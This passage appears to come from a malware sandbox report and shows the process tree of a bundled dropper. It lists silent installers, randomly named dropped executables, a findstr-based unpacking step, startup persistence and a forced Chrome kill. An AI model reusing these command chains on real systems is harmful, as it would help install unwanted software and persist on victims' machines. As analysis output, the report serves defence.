                                                                    • C:\Users\Admin\AppData\Local\Temp\is-L16GN.tmp\Setup.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-L16GN.tmp\Setup.tmp" /SL5="$603C4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-O1TQF.tmp\Setup.exe" /silent /subid=720
                                                                      8⤵
                                                                      • Loads dropped DLL
                                                                      • Drops file in Program Files directory
                                                                      • Modifies system certificate store
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:6748
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                        9⤵
                                                                          PID:7920
                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                            tapinstall.exe remove tap0901
                                                                            10⤵
                                                                            • Checks SCSI registry key(s)
                                                                            PID:7364
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                          9⤵
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:6124
                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                            tapinstall.exe install OemVista.inf tap0901
                                                                            10⤵
                                                                            • Drops file in System32 directory
                                                                            • Drops file in Windows directory
                                                                            • Checks SCSI registry key(s)
                                                                            PID:7388
                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                          9⤵
                                                                          • Drops file in Drivers directory
                                                                          • Drops file in System32 directory
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          • Drops file in Windows directory
                                                                          • Checks SCSI registry key(s)
                                                                          PID:7764
                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                          9⤵
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:7632
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Checks whether UAC is enabled
                                                                  • Drops file in Program Files directory
                                                                  PID:1832
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:5008
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-UCSR8.tmp\MediaBurner2.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-UCSR8.tmp\MediaBurner2.tmp" /SL5="$10302,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:1116
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-HGG0N.tmp\3377047_logo_media.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-HGG0N.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                      7⤵
                                                                      • Drops file in Drivers directory
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      • Drops file in Program Files directory
                                                                      PID:5780
                                                                      • C:\Program Files\Windows Mail\AKVVOUCXMM\ultramediaburner.exe
                                                                        "C:\Program Files\Windows Mail\AKVVOUCXMM\ultramediaburner.exe" /VERYSILENT
                                                                        8⤵
                                                                          PID:5224
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-B12T7.tmp\ultramediaburner.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-B12T7.tmp\ultramediaburner.tmp" /SL5="$40268,281924,62464,C:\Program Files\Windows Mail\AKVVOUCXMM\ultramediaburner.exe" /VERYSILENT
                                                                            9⤵
                                                                            • Drops file in Program Files directory
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:3516
                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                              10⤵
                                                                                PID:5956
                                                                          • C:\Users\Admin\AppData\Local\Temp\a2-59046-6ed-9a5ba-d10d70e4a16a7\Qinozhobijo.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\a2-59046-6ed-9a5ba-d10d70e4a16a7\Qinozhobijo.exe"
                                                                            8⤵
                                                                            • Checks computer location settings
                                                                            PID:4180
                                                                          • C:\Users\Admin\AppData\Local\Temp\62-231e7-7e7-9e08e-3701750ec5d3f\Cokabegibe.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\62-231e7-7e7-9e08e-3701750ec5d3f\Cokabegibe.exe"
                                                                            8⤵
                                                                              PID:5992
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xbpu42qu.jut\GcleanerEU.exe /eufive & exit
                                                                                9⤵
                                                                                  PID:7432
                                                                                  • C:\Users\Admin\AppData\Local\Temp\xbpu42qu.jut\GcleanerEU.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\xbpu42qu.jut\GcleanerEU.exe /eufive
                                                                                    10⤵
                                                                                      PID:8120
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nmwydgnd.3k4\installer.exe /qn CAMPAIGN="654" & exit
                                                                                    9⤵
                                                                                      PID:8056
                                                                                      • C:\Users\Admin\AppData\Local\Temp\nmwydgnd.3k4\installer.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\nmwydgnd.3k4\installer.exe /qn CAMPAIGN="654"
                                                                                        10⤵
                                                                                          PID:7884
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eozy3afh.g3h\ufgaa.exe & exit
                                                                                        9⤵
                                                                                          PID:7744
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m5vxtukg.x5o\anyname.exe & exit
                                                                                          9⤵
                                                                                            PID:6584
                                                                                            • C:\Users\Admin\AppData\Local\Temp\m5vxtukg.x5o\anyname.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\m5vxtukg.x5o\anyname.exe
                                                                                              10⤵
                                                                                                PID:6436
                                                                                                • C:\Users\Admin\AppData\Local\Temp\m5vxtukg.x5o\anyname.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\m5vxtukg.x5o\anyname.exe" -q
                                                                                                  11⤵
                                                                                                    PID:7584
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vhnmq0bs.5jv\gcleaner.exe /mixfive & exit
                                                                                                9⤵
                                                                                                  PID:5664
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vhnmq0bs.5jv\gcleaner.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\vhnmq0bs.5jv\gcleaner.exe /mixfive
                                                                                                    10⤵
                                                                                                      PID:8068
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4xvmv01p.t0b\autosubplayer.exe /S & exit
                                                                                                    9⤵
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:8080
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4052
                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:6088
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks computer location settings
                                                                                            PID:2280
                                                                                            • C:\Users\Admin\Documents\lUiZURdvMLiSlJifvcViWAHb.exe
                                                                                              "C:\Users\Admin\Documents\lUiZURdvMLiSlJifvcViWAHb.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks BIOS information in registry
                                                                                              • Checks whether UAC is enabled
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              PID:3396
                                                                                            • C:\Users\Admin\Documents\7l1uWqrmD04LERjPbfmgK_cb.exe
                                                                                              "C:\Users\Admin\Documents\7l1uWqrmD04LERjPbfmgK_cb.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4660
                                                                                            • C:\Users\Admin\Documents\70dL1IlZGtZqHE4y2M0Pj2xs.exe
                                                                                              "C:\Users\Admin\Documents\70dL1IlZGtZqHE4y2M0Pj2xs.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3300
                                                                                              • C:\Users\Admin\Documents\70dL1IlZGtZqHE4y2M0Pj2xs.exe
                                                                                                C:\Users\Admin\Documents\70dL1IlZGtZqHE4y2M0Pj2xs.exe
                                                                                                7⤵
                                                                                                  PID:5968
                                                                                                • C:\Users\Admin\Documents\70dL1IlZGtZqHE4y2M0Pj2xs.exe
                                                                                                  C:\Users\Admin\Documents\70dL1IlZGtZqHE4y2M0Pj2xs.exe
                                                                                                  7⤵
                                                                                                    PID:5308
                                                                                                • C:\Users\Admin\Documents\x0mppDeVvv5FTF6LlKu2H19n.exe
                                                                                                  "C:\Users\Admin\Documents\x0mppDeVvv5FTF6LlKu2H19n.exe"
                                                                                                  6⤵
                                                                                                    PID:5924
                                                                                                    • C:\Users\Admin\Documents\x0mppDeVvv5FTF6LlKu2H19n.exe
                                                                                                      C:\Users\Admin\Documents\x0mppDeVvv5FTF6LlKu2H19n.exe
                                                                                                      7⤵
                                                                                                        PID:5540
                                                                                                    • C:\Users\Admin\Documents\ElVkk8pxNYd6rvD7p2x4iBKB.exe
                                                                                                      "C:\Users\Admin\Documents\ElVkk8pxNYd6rvD7p2x4iBKB.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2192
                                                                                                      • C:\Users\Admin\Documents\ElVkk8pxNYd6rvD7p2x4iBKB.exe
                                                                                                        "C:\Users\Admin\Documents\ElVkk8pxNYd6rvD7p2x4iBKB.exe" -q
                                                                                                        7⤵
                                                                                                          PID:6156
                                                                                                      • C:\Users\Admin\Documents\3Ckybs0wI6M7wjh7m9yt2KrX.exe
                                                                                                        "C:\Users\Admin\Documents\3Ckybs0wI6M7wjh7m9yt2KrX.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:5488
                                                                                                      • C:\Users\Admin\Documents\_uWGv6isrII48De9sQh6hWls.exe
                                                                                                        "C:\Users\Admin\Documents\_uWGv6isrII48De9sQh6hWls.exe"
                                                                                                        6⤵
                                                                                                          PID:4444
                                                                                                        • C:\Users\Admin\Documents\BbVi0572y7o_eQ7U6k19jE0l.exe
                                                                                                          "C:\Users\Admin\Documents\BbVi0572y7o_eQ7U6k19jE0l.exe"
                                                                                                          6⤵
                                                                                                            PID:2612
                                                                                                          • C:\Users\Admin\Documents\aI6pVMBA2ICdV4MEpbKQv85j.exe
                                                                                                            "C:\Users\Admin\Documents\aI6pVMBA2ICdV4MEpbKQv85j.exe"
                                                                                                            6⤵
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:3232
                                                                                                          • C:\Users\Admin\Documents\ZkJ4UcUsoycbTsFuWEbBhMMQ.exe
                                                                                                            "C:\Users\Admin\Documents\ZkJ4UcUsoycbTsFuWEbBhMMQ.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:4588
                                                                                                            • C:\Users\Admin\AppData\Roaming\6182331.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\6182331.exe"
                                                                                                              7⤵
                                                                                                                PID:4372
                                                                                                              • C:\Users\Admin\AppData\Roaming\7963903.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\7963903.exe"
                                                                                                                7⤵
                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                PID:2324
                                                                                                            • C:\Users\Admin\Documents\mm4Z4EgY_qJLpCzSI_bcr8Cj.exe
                                                                                                              "C:\Users\Admin\Documents\mm4Z4EgY_qJLpCzSI_bcr8Cj.exe"
                                                                                                              6⤵
                                                                                                              • Drops file in Program Files directory
                                                                                                              PID:5472
                                                                                                            • C:\Users\Admin\Documents\4r6i_pEwvxg4tTz8lRVTBAVC.exe
                                                                                                              "C:\Users\Admin\Documents\4r6i_pEwvxg4tTz8lRVTBAVC.exe"
                                                                                                              6⤵
                                                                                                                PID:5420
                                                                                                                • C:\Users\Admin\Documents\4r6i_pEwvxg4tTz8lRVTBAVC.exe
                                                                                                                  "C:\Users\Admin\Documents\4r6i_pEwvxg4tTz8lRVTBAVC.exe"
                                                                                                                  7⤵
                                                                                                                    PID:8740
                                                                                                                • C:\Users\Admin\Documents\wHgKEPbioG42qCWTvG5zPbfK.exe
                                                                                                                  "C:\Users\Admin\Documents\wHgKEPbioG42qCWTvG5zPbfK.exe"
                                                                                                                  6⤵
                                                                                                                    PID:5844
                                                                                                                  • C:\Users\Admin\Documents\LouOvTrvbLeqspt4fR_EVMVO.exe
                                                                                                                    "C:\Users\Admin\Documents\LouOvTrvbLeqspt4fR_EVMVO.exe"
                                                                                                                    6⤵
                                                                                                                      PID:584
                                                                                                                    • C:\Users\Admin\Documents\iy1i7kJ2HCDxXyXbRmbpszpa.exe
                                                                                                                      "C:\Users\Admin\Documents\iy1i7kJ2HCDxXyXbRmbpszpa.exe"
                                                                                                                      6⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:2056
                                                                                                                    • C:\Users\Admin\Documents\PrbYkI1kBQGE2Xv0xuHhzeoB.exe
                                                                                                                      "C:\Users\Admin\Documents\PrbYkI1kBQGE2Xv0xuHhzeoB.exe"
                                                                                                                      6⤵
                                                                                                                        PID:5948
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 660
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:1312
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 672
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:6304
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 684
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:6576
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 668
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:6704
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 888
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:6280
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 1128
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:6980
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 1136
                                                                                                                          7⤵
                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                          • Program crash
                                                                                                                          PID:4048
                                                                                                                      • C:\Users\Admin\Documents\gziaAaqWe7s6dhhUKs6X8Wg4.exe
                                                                                                                        "C:\Users\Admin\Documents\gziaAaqWe7s6dhhUKs6X8Wg4.exe"
                                                                                                                        6⤵
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:1720
                                                                                                                        • C:\Users\Admin\Documents\gziaAaqWe7s6dhhUKs6X8Wg4.exe
                                                                                                                          C:\Users\Admin\Documents\gziaAaqWe7s6dhhUKs6X8Wg4.exe
                                                                                                                          7⤵
                                                                                                                            PID:2076
                                                                                                                        • C:\Users\Admin\Documents\qG2_YijZ5snRgc17DFivnouf.exe
                                                                                                                          "C:\Users\Admin\Documents\qG2_YijZ5snRgc17DFivnouf.exe"
                                                                                                                          6⤵
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Checks whether UAC is enabled
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          PID:1500
                                                                                                                        • C:\Users\Admin\Documents\HCS1224Yq025QJepVeXMDbFX.exe
                                                                                                                          "C:\Users\Admin\Documents\HCS1224Yq025QJepVeXMDbFX.exe"
                                                                                                                          6⤵
                                                                                                                            PID:5820
                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3008
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmp3E34_tmp.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\tmp3E34_tmp.exe"
                                                                                                                            6⤵
                                                                                                                              PID:4640
                                                                                                                              • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                "C:\Windows\System32\dllhost.exe"
                                                                                                                                7⤵
                                                                                                                                  PID:6020
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:5924
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd
                                                                                                                                    8⤵
                                                                                                                                      PID:7068
                                                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                        findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                        9⤵
                                                                                                                                          PID:5296
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                          Esplorarne.exe.com i
                                                                                                                                          9⤵
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          PID:5968
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                            10⤵
                                                                                                                                              PID:6124
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                11⤵
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:7284
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                  12⤵
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:7972
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                    13⤵
                                                                                                                                                      PID:7888
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                        14⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                        PID:4856
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                          15⤵
                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                          PID:2076
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                            16⤵
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:7512
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                              17⤵
                                                                                                                                                                PID:6640
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                  18⤵
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:7332
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                    19⤵
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:5624
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                      20⤵
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:7868
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        21⤵
                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                        PID:2248
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                          22⤵
                                                                                                                                                                          • Drops startup file
                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                          PID:7172
                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                ping GFBFPSXA -n 30
                                                                                                                                                9⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:3056
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4876
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1042904.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1042904.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5508
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\5039275.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\5039275.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                          PID:5556
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3870717.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3870717.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5720
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8974488.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8974488.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5900
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:1576
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                          6⤵
                                                                                                                                            PID:4328
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                              7⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:5756
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-123OG.tmp\wHgKEPbioG42qCWTvG5zPbfK.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-123OG.tmp\wHgKEPbioG42qCWTvG5zPbfK.tmp" /SL5="$40248,138429,56832,C:\Users\Admin\Documents\wHgKEPbioG42qCWTvG5zPbfK.exe"
                                                                                                                                  1⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  PID:2296
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-ML0N2.tmp\Setup.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-ML0N2.tmp\Setup.exe" /Verysilent
                                                                                                                                    2⤵
                                                                                                                                      PID:5156
                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                        3⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Enumerates connected drives
                                                                                                                                        • Modifies system certificate store
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        PID:6604
                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279838 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                          4⤵
                                                                                                                                            PID:824
                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                      1⤵
                                                                                                                                      • Enumerates connected drives
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      PID:6560
                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 1B775BC28C746A0E9C64EC4A395B8176 C
                                                                                                                                        2⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:7088
                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding A18268A6D80E519173D40801644E3BB1 C
                                                                                                                                        2⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:1852
                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 2C5110CB24B562A0F6B587427C74D8E7 C
                                                                                                                                        2⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:7340
                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding DFF369147528DBFC2C03C25BFAD105AC
                                                                                                                                        2⤵
                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:6156
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
